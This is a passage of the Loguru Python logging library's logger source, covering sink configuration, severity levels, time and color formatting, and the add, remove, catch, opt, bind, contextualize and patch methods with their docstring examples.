``True`` and ``False`` to respectively authorize and discard all module logs
unconditionally. In order to set a default level, the ``""`` module name should be used as
it is the parent of all modules (it does not suppress global ``level`` threshold, though).
Note that while calling a logging method, the keyword arguments (if any) are automatically
added to the ``extra`` dict for convenient contextualization (in addition to being used for
formatting).
.. _levels:
.. rubric:: The severity levels
Each logged message is associated with a severity level. These levels make it possible to
prioritize messages and to choose the verbosity of the logs according to usages. For
example, it allows to display some debugging information to a developer, while hiding it to
the end user running the application.
The ``level`` attribute of every added sink controls the minimum threshold from which log
messages are allowed to be emitted. While using the ``logger``, you are in charge of
configuring the appropriate granularity of your logs. It is possible to add even more custom
levels by using the |level| method.
Here are the standard levels with their default severity value, each one is associated with
a logging method of the same name:
+----------------------+------------------------+------------------------+
| Level name | Severity value | Logger method |
+======================+========================+========================+
| ``TRACE`` | 5 | |logger.trace| |
+----------------------+------------------------+------------------------+
| ``DEBUG`` | 10 | |logger.debug| |
+----------------------+------------------------+------------------------+
| ``INFO`` | 20 | |logger.info| |
+----------------------+------------------------+------------------------+
| ``SUCCESS`` | 25 | |logger.success| |
+----------------------+------------------------+------------------------+
| ``WARNING`` | 30 | |logger.warning| |
+----------------------+------------------------+------------------------+
| ``ERROR`` | 40 | |logger.error| |
+----------------------+------------------------+------------------------+
| ``CRITICAL`` | 50 | |logger.critical| |
+----------------------+------------------------+------------------------+
.. _record:
.. rubric:: The record dict
The record is just a Python dict, accessible from sinks by ``message.record``. It contains
all contextual information of the logging call (time, function, file, line, level, etc.).
Each of its key can be used in the handler's ``format`` so the corresponding value is
properly displayed in the logged message (e.g. ``"{level}"`` -> ``"INFO"``). Some record's
values are objects with two or more attributes, these can be formatted with ``"{key.attr}"``
(``"{key}"`` would display one by default). `Formatting directives`_ like ``"{key: >3}"``
also works and is particularly useful for time (see below).
+------------+---------------------------------+----------------------------+
| Key | Description | Attributes |
+============+=================================+============================+
| elapsed | The time elapsed since the | See |timedelta| |
| | start of the program | |
+------------+---------------------------------+----------------------------+
| exception | The formatted exception if any, | ``type``, ``value``, |
| | ``None`` otherwise | ``traceback`` |
+------------+---------------------------------+----------------------------+
| extra | The dict of attributes | None |
| | bound by the user (see |bind|) | |
+------------+---------------------------------+----------------------------+
| file | The file where the logging call | ``name`` (default), |
| | was made | ``path`` |
+------------+---------------------------------+----------------------------+
| function | The function from which the | None |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| level | The severity used to log the | ``name`` (default), |
| | message | ``no``, ``icon`` |
+------------+---------------------------------+----------------------------+
| line | The line number in the source | None |
| | code | |
+------------+---------------------------------+----------------------------+
| message | The logged message (not yet | None |
| | formatted) | |
+------------+---------------------------------+----------------------------+
| module | The module where the logging | None |
| | call was made | |
+------------+---------------------------------+----------------------------+
| name | The ``__name__`` where the | None |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| process | The process in which the | ``name``, ``id`` (default) |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| thread | The thread in which the | ``name``, ``id`` (default) |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| time | The aware local time when the | See |datetime| |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
.. _time:
.. rubric:: The time formatting
To use your favorite time representation, you can set it directly in the time formatter
specifier of your handler format, like for example ``format="{time:HH:mm:ss} {message}"``.
Note that this datetime represents your local time, and it is also made timezone-aware,
so you can display the UTC offset to avoid ambiguities.
The time field can be formatted using more human-friendly tokens. These constitute a subset
of the one used by the `Pendulum`_ library of `@sdispater`_. To escape a token, just add
square brackets around it, for example ``"[YY]"`` would display literally ``"YY"``.
If you prefer to display UTC rather than local time, you can add ``"!UTC"`` at the very end
of the time format, like ``{time:HH:mm:ss!UTC}``. Doing so will convert the ``datetime``
to UTC before formatting.
If no time formatter specifier is used, like for example if ``format="{time} {message}"``,
the default one will use ISO 8601.
+------------------------+---------+----------------------------------------+
| | Token | Output |
+========================+=========+========================================+
| Year | YYYY | 2000, 2001, 2002 ... 2012, 2013 |
| +---------+----------------------------------------+
| | YY | 00, 01, 02 ... 12, 13 |
+------------------------+---------+----------------------------------------+
| Quarter | Q | 1 2 3 4 |
+------------------------+---------+----------------------------------------+
| Month | MMMM | January, February, March ... |
| +---------+----------------------------------------+
| | MMM | Jan, Feb, Mar ... |
| +---------+----------------------------------------+
| | MM | 01, 02, 03 ... 11, 12 |
| +---------+----------------------------------------+
| | M | 1, 2, 3 ... 11, 12 |
+------------------------+---------+----------------------------------------+
| Day of Year | DDDD | 001, 002, 003 ... 364, 365 |
| +---------+----------------------------------------+
| | DDD | 1, 2, 3 ... 364, 365 |
+------------------------+---------+----------------------------------------+
| Day of Month | DD | 01, 02, 03 ... 30, 31 |
| +---------+----------------------------------------+
| | D | 1, 2, 3 ... 30, 31 |
+------------------------+---------+----------------------------------------+
| Day of Week | dddd | Monday, Tuesday, Wednesday ... |
| +---------+----------------------------------------+
| | ddd | Mon, Tue, Wed ... |
| +---------+----------------------------------------+
| | d | 0, 1, 2 ... 6 |
+------------------------+---------+----------------------------------------+
| Days of ISO Week | E | 1, 2, 3 ... 7 |
+------------------------+---------+----------------------------------------+
| Hour | HH | 00, 01, 02 ... 23, 24 |
| +---------+----------------------------------------+
| | H | 0, 1, 2 ... 23, 24 |
| +---------+----------------------------------------+
| | hh | 01, 02, 03 ... 11, 12 |
| +---------+----------------------------------------+
| | h | 1, 2, 3 ... 11, 12 |
+------------------------+---------+----------------------------------------+
| Minute | mm | 00, 01, 02 ... 58, 59 |
| +---------+----------------------------------------+
| | m | 0, 1, 2 ... 58, 59 |
+------------------------+---------+----------------------------------------+
| Second | ss | 00, 01, 02 ... 58, 59 |
| +---------+----------------------------------------+
| | s | 0, 1, 2 ... 58, 59 |
+------------------------+---------+----------------------------------------+
| Fractional Second | S | 0 1 ... 8 9 |
| +---------+----------------------------------------+
| | SS | 00, 01, 02 ... 98, 99 |
| +---------+----------------------------------------+
| | SSS | 000 001 ... 998 999 |
| +---------+----------------------------------------+
| | SSSS... | 000[0..] 001[0..] ... 998[0..] 999[0..]|
| +---------+----------------------------------------+
| | SSSSSS | 000000 000001 ... 999998 999999 |
+------------------------+---------+----------------------------------------+
| AM / PM | A | AM, PM |
+------------------------+---------+----------------------------------------+
| Timezone | Z | -07:00, -06:00 ... +06:00, +07:00 |
| +---------+----------------------------------------+
| | ZZ | -0700, -0600 ... +0600, +0700 |
| +---------+----------------------------------------+
| | zz | EST CST ... MST PST |
+------------------------+---------+----------------------------------------+
| Seconds timestamp | X | 1381685817, 1234567890.123 |
+------------------------+---------+----------------------------------------+
| Microseconds timestamp | x | 1234567890123 |
+------------------------+---------+----------------------------------------+
.. _file:
.. rubric:: The file sinks
If the sink is a |str| or a |Path|, the corresponding file will be opened for writing logs.
The path can also contain a special ``"{time}"`` field that will be formatted with the
current date at file creation.
The ``rotation`` check is made before logging each message. If there is already an existing
file with the same name that the file to be created, then the existing file is renamed by
appending the date to its basename to prevent file overwriting. This parameter accepts:
- an |int| which corresponds to the maximum file size in bytes before that the current
logged file is closed and a new one started over.
- a |timedelta| which indicates the frequency of each new rotation.
- a |time| which specifies the hour when the daily rotation should occur.
- a |str| for human-friendly parametrization of one of the previously enumerated types.
Examples: ``"100 MB"``, ``"0.5 GB"``, ``"1 month 2 weeks"``, ``"4 days"``, ``"10h"``,
``"monthly"``, ``"18:00"``, ``"sunday"``, ``"w0"``, ``"monday at 12:00"``, ...
- a |callable|_ which will be invoked before logging. It should accept two arguments: the
logged message and the file object, and it should return ``True`` if the rotation should
happen now, ``False`` otherwise.
The ``retention`` occurs at rotation or at sink stop if rotation is ``None``. Files are
selected if they match the pattern ``"basename(.*).ext(.*)"`` (possible time fields are
beforehand replaced with ``.*``) based on the sink file. This parameter accepts:
- an |int| which indicates the number of log files to keep, while older files are removed.
- a |timedelta| which specifies the maximum age of files to keep.
- a |str| for human-friendly parametrization of the maximum age of files to keep.
Examples: ``"1 week, 3 days"``, ``"2 months"``, ...
- a |callable|_ which will be invoked before the retention process. It should accept the
list of log files as argument and process to whatever it wants (moving files, removing
them, etc.).
The ``compression`` happens at rotation or at sink stop if rotation is ``None``. This
parameter accepts:
- a |str| which corresponds to the compressed or archived file extension. This can be one
of: ``"gz"``, ``"bz2"``, ``"xz"``, ``"lzma"``, ``"tar"``, ``"tar.gz"``, ``"tar.bz2"``,
``"tar.xz"``, ``"zip"``.
- a |callable|_ which will be invoked before file termination. It should accept the path of
the log file as argument and process to whatever it wants (custom compression, network
sending, removing it, etc.).
Either way, if you use a custom function designed according to your preferences, you must be
very careful not to use the ``logger`` within your function. Otherwise, there is a risk that
your program hang because of a deadlock.
.. _color:
.. rubric:: The color markups
To add colors to your logs, you just have to enclose your format string with the appropriate
tags (e.g. ``<red>some message</red>``). These tags are automatically removed if the sink
doesn't support ansi codes. For convenience, you can use ``</>`` to close the last opening
tag without repeating its name (e.g. ``<red>another message</>``).
The special tag ``<level>`` (abbreviated with ``<lvl>``) is transformed according to
the configured color of the logged message level.
Tags which are not recognized will raise an exception during parsing, to inform you about
possible misuse. If you wish to display a markup tag literally, you can escape it by
prepending a ``\`` like for example ``\<blue>``. If, for some reason, you need to escape a
string programmatically, note that the regex used internally to parse markup tags is
``r"\\?</?((?:[fb]g\s)?[^<>\s]*)>"``.
Note that when logging a message with ``opt(colors=True)``, color tags present in the
formatting arguments (``args`` and ``kwargs``) are completely ignored. This is important if
you need to log strings containing markups that might interfere with the color tags (in this
case, do not use f-string).
Here are the available tags (note that compatibility may vary depending on terminal):
+------------------------------------+--------------------------------------+
| Color (abbr) | Styles (abbr) |
+====================================+======================================+
| Black (k) | Bold (b) |
+------------------------------------+--------------------------------------+
| Blue (e) | Dim (d) |
+------------------------------------+--------------------------------------+
| Cyan (c) | Normal (n) |
+------------------------------------+--------------------------------------+
| Green (g) | Italic (i) |
+------------------------------------+--------------------------------------+
| Magenta (m) | Underline (u) |
+------------------------------------+--------------------------------------+
| Red (r) | Strike (s) |
+------------------------------------+--------------------------------------+
| White (w) | Reverse (v) |
+------------------------------------+--------------------------------------+
| Yellow (y) | Blink (l) |
+------------------------------------+--------------------------------------+
| | Hide (h) |
+------------------------------------+--------------------------------------+
Usage:
+-----------------+-------------------------------------------------------------------+
| Description | Examples |
| +---------------------------------+---------------------------------+
| | Foreground | Background |
+=================+=================================+=================================+
| Basic colors | ``<red>``, ``<r>`` | ``<GREEN>``, ``<G>`` |
+-----------------+---------------------------------+---------------------------------+
| Light colors | ``<light-blue>``, ``<le>`` | ``<LIGHT-CYAN>``, ``<LC>`` |
+-----------------+---------------------------------+---------------------------------+
| 8-bit colors | ``<fg 86>``, ``<fg 255>`` | ``<bg 42>``, ``<bg 9>`` |
+-----------------+---------------------------------+---------------------------------+
| Hex colors | ``<fg #00005f>``, ``<fg #EE1>`` | ``<bg #AF5FD7>``, ``<bg #fff>`` |
+-----------------+---------------------------------+---------------------------------+
| RGB colors | ``<fg 0,95,0>`` | ``<bg 72,119,65>`` |
+-----------------+---------------------------------+---------------------------------+
| Stylizing | ``<bold>``, ``<b>``, ``<underline>``, ``<u>`` |
+-----------------+-------------------------------------------------------------------+
.. _env:
.. rubric:: The environment variables
The default values of sink parameters can be entirely customized. This is particularly
useful if you don't like the log format of the pre-configured sink.
Each of the |add| default parameter can be modified by setting the ``LOGURU_[PARAM]``
environment variable. For example on Linux: ``export LOGURU_FORMAT="{time} - {message}"``
or ``export LOGURU_DIAGNOSE=NO``.
The default levels' attributes can also be modified by setting the ``LOGURU_[LEVEL]_[ATTR]``
environment variable. For example, on Windows: ``setx LOGURU_DEBUG_COLOR "<blue>"``
or ``setx LOGURU_TRACE_ICON "🚀"``. If you use the ``set`` command, do not include quotes
but escape special symbol as needed, e.g. ``set LOGURU_DEBUG_COLOR=^<blue^>``.
If you want to disable the pre-configured sink, you can set the ``LOGURU_AUTOINIT``
variable to ``False``.
On Linux, you will probably need to edit the ``~/.profile`` file to make this persistent. On
Windows, don't forget to restart your terminal for the change to be taken into account.
Examples
--------
>>> logger.add(sys.stdout, format="{time} - {level} - {message}", filter="sub.module")
>>> logger.add("file_{time}.log", level="TRACE", rotation="100 MB")
>>> def debug_only(record):
... return record["level"].name == "DEBUG"
...
>>> logger.add("debug.log", filter=debug_only) # Other levels are filtered out
>>> def my_sink(message):
... record = message.record
... update_db(message, time=record["time"], level=record["level"])
...
>>> logger.add(my_sink)
>>> level_per_module = {
... "": "DEBUG",
... "third.lib": "WARNING",
... "anotherlib": False
... }
>>> logger.add(lambda m: print(m, end=""), filter=level_per_module, level=0)
>>> async def publish(message):
... await api.post(message)
...
>>> logger.add(publish, serialize=True)
>>> from logging import StreamHandler
>>> logger.add(StreamHandler(sys.stderr), format="{message}")
>>> class RandomStream:
... def __init__(self, seed, threshold):
... self.threshold = threshold
... random.seed(seed)
... def write(self, message):
... if random.random() > self.threshold:
... print(message)
...
>>> stream_object = RandomStream(seed=12345, threshold=0.25)
>>> logger.add(stream_object, level="INFO")
"""
with self._core.lock:
handler_id = next(self._core.handlers_count)
error_interceptor = ErrorInterceptor(catch, handler_id)
if colorize is None and serialize:
colorize = False
if isinstance(sink, (str, PathLike)):
path = sink
name = "'%s'" % path
if colorize is None:
colorize = False
wrapped_sink = FileSink(path, **kwargs)
kwargs = {}
encoding = wrapped_sink.encoding
terminator = "\n"
exception_prefix = ""
elif hasattr(sink, "write") and callable(sink.write):
name = getattr(sink, "name", None) or repr(sink)
if colorize is None:
colorize = _colorama.should_colorize(sink)
if colorize is True and _colorama.should_wrap(sink):
stream = _colorama.wrap(sink)
else:
stream = sink
wrapped_sink = StreamSink(stream)
encoding = getattr(sink, "encoding", None)
terminator = "\n"
exception_prefix = ""
elif isinstance(sink, logging.Handler):
name = repr(sink)
if colorize is None:
colorize = False
wrapped_sink = StandardSink(sink)
encoding = getattr(sink, "encoding", None)
terminator = ""
exception_prefix = "\n"
elif iscoroutinefunction(sink) or iscoroutinefunction(getattr(sink, "__call__", None)):
name = getattr(sink, "__name__", None) or repr(sink)
if colorize is None:
colorize = False
loop = kwargs.pop("loop", None)
# The worker thread needs an event loop, it can't create a new one internally because it
# has to be accessible by the user while calling "complete()", instead we use the global
# one when the sink is added. If "enqueue=False" the event loop is dynamically retrieved
# at each logging call, which is much more convenient. However, coroutine can't access
# running loop in Python 3.5.2 and earlier versions, see python/asyncio#452.
if enqueue and loop is None:
loop = asyncio.get_event_loop()
coro = sink if iscoroutinefunction(sink) else sink.__call__
wrapped_sink = AsyncSink(coro, loop, error_interceptor)
encoding = "utf8"
terminator = "\n"
exception_prefix = ""
elif callable(sink):
name = getattr(sink, "__name__", None) or repr(sink)
if colorize is None:
colorize = False
wrapped_sink = CallableSink(sink)
encoding = "utf8"
terminator = "\n"
exception_prefix = ""
else:
raise TypeError("Cannot log to objects of type '%s'" % type(sink).__name__)
if kwargs:
raise TypeError("add() got an unexpected keyword argument '%s'" % next(iter(kwargs)))
if filter is None:
filter_func = None
elif filter == "":
filter_func = _filters.filter_none
elif isinstance(filter, str):
parent = filter + "."
length = len(parent)
filter_func = functools.partial(_filters.filter_by_name, parent=parent, length=length)
elif isinstance(filter, dict):
level_per_module = {}
for module, level_ in filter.items():
if module is not None and not isinstance(module, str):
raise TypeError(
"The filter dict contains an invalid module, "
"it should be a string (or None), not: '%s'" % type(module).__name__
)
if level_ is False:
levelno_ = False
elif level_ is True:
levelno_ = 0
elif isinstance(level_, str):
try:
levelno_ = self.level(level_).no
except ValueError:
raise ValueError(
"The filter dict contains a module '%s' associated to a level name "
"which does not exist: '%s'" % (module, level_)
)
elif isinstance(level_, int):
levelno_ = level_
else:
raise TypeError(
"The filter dict contains a module '%s' associated to an invalid level, "
"it should be an integer, a string or a boolean, not: '%s'"
% (module, type(level_).__name__)
)
if levelno_ < 0:
raise ValueError(
"The filter dict contains a module '%s' associated to an invalid level, "
"it should be a positive interger, not: '%d'" % (module, levelno_)
)
level_per_module[module] = levelno_
filter_func = functools.partial(
_filters.filter_by_level, level_per_module=level_per_module
)
elif callable(filter):
if filter == builtins.filter:
raise ValueError(
"The built-in 'filter()' function cannot be used as a 'filter' parameter, "
"this is most likely a mistake (please double-check the arguments passed "
"to 'logger.add()')."
)
filter_func = filter
else:
raise TypeError(
"Invalid filter, it should be a function, a string or a dict, not: '%s'"
% type(filter).__name__
)
if isinstance(level, str):
levelno = self.level(level).no
elif isinstance(level, int):
levelno = level
else:
raise TypeError(
"Invalid level, it should be an integer or a string, not: '%s'"
% type(level).__name__
)
if levelno < 0:
raise ValueError(
"Invalid level value, it should be a positive integer, not: %d" % levelno
)
if isinstance(format, str):
try:
formatter = Colorizer.prepare_format(format + terminator + "{exception}")
except ValueError as e:
raise ValueError(
"Invalid format, color markups could not be parsed correctly"
) from e
is_formatter_dynamic = False
elif callable(format):
if format == builtins.format:
raise ValueError(
"The built-in 'format()' function cannot be used as a 'format' parameter, "
"this is most likely a mistake (please double-check the arguments passed "
"to 'logger.add()')."
)
formatter = format
is_formatter_dynamic = True
else:
raise TypeError(
"Invalid format, it should be a string or a function, not: '%s'"
% type(format).__name__
)
if not isinstance(encoding, str):
encoding = "ascii"
with self._core.lock:
exception_formatter = ExceptionFormatter(
colorize=colorize,
encoding=encoding,
diagnose=diagnose,
backtrace=backtrace,
hidden_frames_filename=self.catch.__code__.co_filename,
prefix=exception_prefix,
)
handler = Handler(
name=name,
sink=wrapped_sink,
levelno=levelno,
formatter=formatter,
is_formatter_dynamic=is_formatter_dynamic,
filter_=filter_func,
colorize=colorize,
serialize=serialize,
enqueue=enqueue,
id_=handler_id,
error_interceptor=error_interceptor,
exception_formatter=exception_formatter,
levels_ansi_codes=self._core.levels_ansi_codes,
)
handlers = self._core.handlers.copy()
handlers[handler_id] = handler
self._core.min_level = min(self._core.min_level, levelno)
self._core.handlers = handlers
return handler_id
def remove(self, handler_id=None):
"""Remove a previously added handler and stop sending logs to its sink.
Parameters
----------
handler_id : |int| or ``None``
The id of the sink to remove, as it was returned by the |add| method. If ``None``, all
handlers are removed. The pre-configured handler is guaranteed to have the index ``0``.
Raises
------
ValueError
If ``handler_id`` is not ``None`` but there is no active handler with such id.
Examples
--------
>>> i = logger.add(sys.stderr, format="{message}")
>>> logger.info("Logging")
Logging
>>> logger.remove(i)
>>> logger.info("No longer logging")
"""
if not (handler_id is None or isinstance(handler_id, int)):
raise TypeError(
"Invalid handler id, it should be an integer as returned "
"by the 'add()' method (or None), not: '%s'" % type(handler_id).__name__
)
with self._core.lock:
handlers = self._core.handlers.copy()
if handler_id is not None and handler_id not in handlers:
raise ValueError("There is no existing handler with id %d" % handler_id) from None
if handler_id is None:
handler_ids = list(handlers.keys())
else:
handler_ids = [handler_id]
for handler_id in handler_ids:
handler = handlers.pop(handler_id)
# This needs to be done first in case "stop()" raises an exception
levelnos = (h.levelno for h in handlers.values())
self._core.min_level = min(levelnos, default=float("inf"))
self._core.handlers = handlers
handler.stop()
def complete(self):
"""Wait for the end of enqueued messages and asynchronous tasks scheduled by handlers.
This method proceeds in two steps: first it waits for all logging messages added to handlers
with ``enqueue=True`` to be processed, then it returns an object that can be awaited to
finalize all logging tasks added to the event loop by coroutine sinks.
It can be called from non-asynchronous code. This is especially recommended when the
``logger`` is utilized with ``multiprocessing`` to ensure messages put to the internal
queue have been properly transmitted before leaving a child process.
The returned object should be awaited before the end of a coroutine executed by
|asyncio.run| or |loop.run_until_complete| to ensure all asynchronous logging messages are
processed. The function |asyncio.get_event_loop| is called beforehand, only tasks scheduled
in the same loop that the current one will be awaited by the method.
Returns
-------
:term:`awaitable`
An awaitable object which ensures all asynchronous logging calls are completed when
awaited.
Examples
--------
>>> async def sink(message):
... await asyncio.sleep(0.1) # IO processing...
... print(message, end="")
...
>>> async def work():
... logger.info("Start")
... logger.info("End")
... await logger.complete()
...
>>> logger.add(sink)
1
>>> asyncio.run(work())
Start
End
>>> def process():
... logger.info("Message sent from the child")
... logger.complete()
...
>>> logger.add(sys.stderr, enqueue=True)
1
>>> process = multiprocessing.Process(target=process)
>>> process.start()
>>> process.join()
Message sent from the child
"""
with self._core.lock:
handlers = self._core.handlers.copy()
for handler in handlers.values():
handler.complete_queue()
class AwaitableCompleter:
def __await__(self_):
with self._core.lock:
handlers = self._core.handlers.copy()
for handler in handlers.values():
yield from handler.complete_async().__await__()
return AwaitableCompleter()
def catch(
self,
exception=Exception,
*,
level="ERROR",
reraise=False,
onerror=None,
exclude=None,
default=None,
message="An error has been caught in function '{record[function]}', "
"process '{record[process].name}' ({record[process].id}), "
"thread '{record[thread].name}' ({record[thread].id}):"
):
"""Return a decorator to automatically log possibly caught error in wrapped function.
This is useful to ensure unexpected exceptions are logged, the entire program can be
wrapped by this method. This is also very useful to decorate |Thread.run| methods while
using threads to propagate errors to the main logger thread.
Note that the visibility of variables values (which uses the great |better_exceptions|_
library from `@Qix-`_) depends on the ``diagnose`` option of each configured sink.
The returned object can also be used as a context manager.
Parameters
----------
exception : |Exception|, optional
The type of exception to intercept. If several types should be caught, a tuple of
exceptions can be used too.
level : |str| or |int|, optional
The level name or severity with which the message should be logged.
reraise : |bool|, optional
Whether the exception should be raised again and hence propagated to the caller.
onerror : |callable|_, optional
A function that will be called if an error occurs, once the message has been logged.
It should accept the exception instance as it sole argument.
exclude : |Exception|, optional
A type of exception (or a tuple of types) that will be purposely ignored and hence
propagated to the caller without being logged.
default : optional
The value to be returned by the decorated function if an error occurred without being
re-raised.
message : |str|, optional
The message that will be automatically logged if an exception occurs. Note that it will
be formatted with the ``record`` attribute.
Returns
-------
:term:`decorator` / :term:`context manager`
An object that can be used to decorate a function or as a context manager to log
exceptions possibly caught.
Examples
--------
>>> @logger.catch
... def f(x):
... 100 / x
...
>>> def g():
... f(10)
... f(0)
...
>>> g()
ERROR - An error has been caught in function 'g', process 'Main' (367), thread 'ch1' (1398):
Traceback (most recent call last):
File "program.py", line 12, in <module>
g()
└ <function g at 0x7f225fe2bc80>
> File "program.py", line 10, in g
f(0)
└ <function f at 0x7f225fe2b9d8>
File "program.py", line 6, in f
100 / x
└ 0
ZeroDivisionError: division by zero
>>> with logger.catch(message="Because we never know..."):
... main() # No exception, no logs
>>> # Use 'onerror' to prevent the program exit code to be 0 (if 'reraise=False') while
>>> # also avoiding the stacktrace to be duplicated on stderr (if 'reraise=True').
>>> @logger.catch(onerror=lambda _: sys.exit(1))
... def main():
... 1 / 0
"""
if callable(exception) and (
not isclass(exception) or not issubclass(exception, BaseException)
):
return self.catch()(exception)
class Catcher:
def __init__(self_, from_decorator):
self_._from_decorator = from_decorator
def __enter__(self_):
return None
def __exit__(self_, type_, value, traceback_):
if type_ is None:
return
if not issubclass(type_, exception):
return False
if exclude is not None and issubclass(type_, exclude):
return False
from_decorator = self_._from_decorator
_, depth, _, *options = self._options
if from_decorator:
depth += 1
catch_options = [(type_, value, traceback_), depth, True] + options
level_id, static_level_no = self._dynamic_level(level)
self._log(level_id, static_level_no, from_decorator, catch_options, message, (), {})
if onerror is not None:
onerror(value)
return not reraise
def __call__(_, function):
catcher = Catcher(True)
if iscoroutinefunction(function):
async def catch_wrapper(*args, **kwargs):
with catcher:
return await function(*args, **kwargs)
return default
elif isgeneratorfunction(function):
def catch_wrapper(*args, **kwargs):
with catcher:
return (yield from function(*args, **kwargs))
return default
else:
def catch_wrapper(*args, **kwargs):
with catcher:
return function(*args, **kwargs)
return default
functools.update_wrapper(catch_wrapper, function)
return catch_wrapper
return Catcher(False)
def opt(
self,
*,
exception=None,
record=False,
lazy=False,
colors=False,
raw=False,
capture=True,
depth=0,
ansi=False
):
r"""Parametrize a logging call to slightly change generated log message.
Note that it's not possible to chain |opt| calls, the last one takes precedence over the
others as it will "reset" the options to their default values.
Parameters
----------
exception : |bool|, |tuple| or |Exception|, optional
If it does not evaluate as ``False``, the passed exception is formatted and added to the
log message. It could be an |Exception| object or a ``(type, value, traceback)`` tuple,
otherwise the exception information is retrieved from |sys.exc_info|.
record : |bool|, optional
If ``True``, the record dict contextualizing the logging call can be used to format the
message by using ``{record[key]}`` in the log message.
lazy : |bool|, optional
If ``True``, the logging call attribute to format the message should be functions which
will be called only if the level is high enough. This can be used to avoid expensive
functions if not necessary.
colors : |bool|, optional
If ``True``, logged message will be colorized according to the markups it possibly
contains.
raw : |bool|, optional
If ``True``, the formatting of each sink will be bypassed and the message will be sent
as is.
capture : |bool|, optional
If ``False``, the ``**kwargs`` of logged message will not automatically populate
the ``extra`` dict (although they are still used for formatting).
depth : |int|, optional
Specify which stacktrace should be used to contextualize the logged message. This is
useful while using the logger from inside a wrapped function to retrieve worthwhile
information.
ansi : |bool|, optional
Deprecated since version 0.4.1: the ``ansi`` parameter will be removed in Loguru 1.0.0,
it is replaced by ``colors`` which is a more appropriate name.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but transforming logged message adequately before
sending.
Examples
--------
>>> try:
... 1 / 0
... except ZeroDivisionError:
... logger.opt(exception=True).debug("Exception logged with debug level:")
...
[18:10:02] DEBUG in '<module>' - Exception logged with debug level:
Traceback (most recent call last, catch point marked):
> File "<stdin>", line 2, in <module>
ZeroDivisionError: division by zero
>>> logger.opt(record=True).info("Current line is: {record[line]}")
[18:10:33] INFO in '<module>' - Current line is: 1
>>> logger.opt(lazy=True).debug("If sink <= DEBUG: {x}", x=lambda: math.factorial(2**5))
[18:11:19] DEBUG in '<module>' - If sink <= DEBUG: 263130836933693530167218012160000000
>>> logger.opt(colors=True).warning("We got a <red>BIG</red> problem")
[18:11:30] WARNING in '<module>' - We got a BIG problem
>>> logger.opt(raw=True).debug("No formatting\n")
No formatting
>>> logger.opt(capture=False).info("Displayed but not captured: {value}", value=123)
[18:11:41] Displayed but not captured: 123
>>> def wrapped():
... logger.opt(depth=1).info("Get parent context")
...
>>> def func():
... wrapped()
...
>>> func()
[18:11:54] DEBUG in 'func' - Get parent context
"""
if ansi:
colors = True
warnings.warn(
"The 'ansi' parameter is deprecated, please use 'colors' instead",
DeprecationWarning,
)
args = self._options[-2:]
return Logger(self._core, exception, depth, record, lazy, colors, raw, capture, *args)
def bind(__self, **kwargs):
"""Bind attributes to the ``extra`` dict of each logged message record.
This is used to add custom context to each logging call.
Parameters
----------
**kwargs
Mapping between keys and values that will be added to the ``extra`` dict.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but which sends record with the customized ``extra``
dict.
Examples
--------
>>> logger.add(sys.stderr, format="{extra[ip]} - {message}")
>>> class Server:
... def __init__(self, ip):
... self.ip = ip
... self.logger = logger.bind(ip=ip)
... def call(self, message):
... self.logger.info(message)
...
>>> instance_1 = Server("192.168.0.200")
>>> instance_2 = Server("127.0.0.1")
>>> instance_1.call("First instance")
192.168.0.200 - First instance
>>> instance_2.call("Second instance")
127.0.0.1 - Second instance
"""
*options, extra = __self._options
return Logger(__self._core, *options, {**extra, **kwargs})
@contextlib.contextmanager
def contextualize(__self, **kwargs):
"""Bind attributes to the context-local ``extra`` dict while inside the ``with`` block.
Contrary to |bind| there is no ``logger`` returned, the ``extra`` dict is modified in-place
and updated globally. Most importantly, it uses |contextvars| which means that
contextualized values are unique to each threads and asynchronous tasks.
The ``extra`` dict will retrieve its initial state once the context manager is exited.
Parameters
----------
**kwargs
Mapping between keys and values that will be added to the context-local ``extra`` dict.
Returns
-------
:term:`context manager` / :term:`decorator`
A context manager (usable as a decorator too) that will bind the attributes once entered
and restore the initial state of the ``extra`` dict while exited.
Examples
--------
>>> logger.add(sys.stderr, format="{message} | {extra}")
1
>>> def task():
... logger.info("Processing!")
...
>>> with logger.contextualize(task_id=123):
... task()
...
Processing! | {'task_id': 123}
>>> logger.info("Done.")
Done. | {}
"""
with __self._core.lock:
new_context = {**context.get(), **kwargs}
token = context.set(new_context)
try:
yield
finally:
with __self._core.lock:
context.reset(token)
def patch(self, patcher):
"""Attach a function to modify the record dict created by each logging call.
The ``patcher`` may be used to update the record on-the-fly before it's propagated to the
handlers. This allows the "extra" dict to be populated with dynamic values and also permits
advanced modifications of the record emitted while logging a message. The function is called
once before sending the log message to the different handlers.
It is recommended to apply modification on the ``record["extra"]`` dict rather than on the
``record`` dict itself, as some values are used internally by `Loguru`, and modify them may
produce unexpected results.
Parameters
----------
patcher: |callable|_
The function to which the record dict will be passed as the sole argument. This function
is in charge of updating the record in-place, the function does not need to return any
value, the modified record object will be re-used.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but which records are passed through the ``patcher``
function before being sent to the added handlers.
Examples
--------
>>> logger.add(sys.stderr, format="{extra[utc]} {message}")
>>> logger = logger.patch(lambda record: record["extra"].update(utc=datetime.utcnow())
>>> logger.info("That's way, you can log messages with time displayed in UTC")
>>> def wrapper(func):
... @functools.wraps(func)
... def wrapped(*args, **kwargs):
... logger.patch(lambda r: r.update(function=func.__name__)).info("Wrapped!")
... return func(*args, **kwargs)
... return wrapped
>>> def recv_record_from_network(pipe):
... record = pickle.loads(pipe.read())
... level, message = record["level"], record["message"]
... logger.patch(lambda r: r.update(record)).log(level, message)
"""
*options, _, extra = self._options
return Logger(self._core, *options, patcher, extra)
def level(self, name, no=None, color=None, icon=None):
"""Add, update or retrieve a logging level.
Logging levels are defined by their ``name`` to which a severity ``no``, an ansi ``color``
tag and an ``icon`` are associated and possibly modified at run-time. To |log| to a custom
level, you should necessarily use its name, the severity number is not linked back to levels
name (this implies that several levels can share the same severity).
To add a new level, its ``name`` and its ``no`` are required. A ``color`` and an ``icon``
can also be specified or will be empty by default.
To update an existing level, pass its ``name`` with the parameters to be changed. It is not
possible to modify the ``no`` of a level once it has been added.
To retrieve level information, the ``name`` solely suffices.
Parameters
----------
name : |str|
The name of the logging level.
no : |int|
The severity of the level to be added or updated.
color : |str|
The color markup of the level to be added or updated.
icon : |str|
The icon of the level to be added or updated.
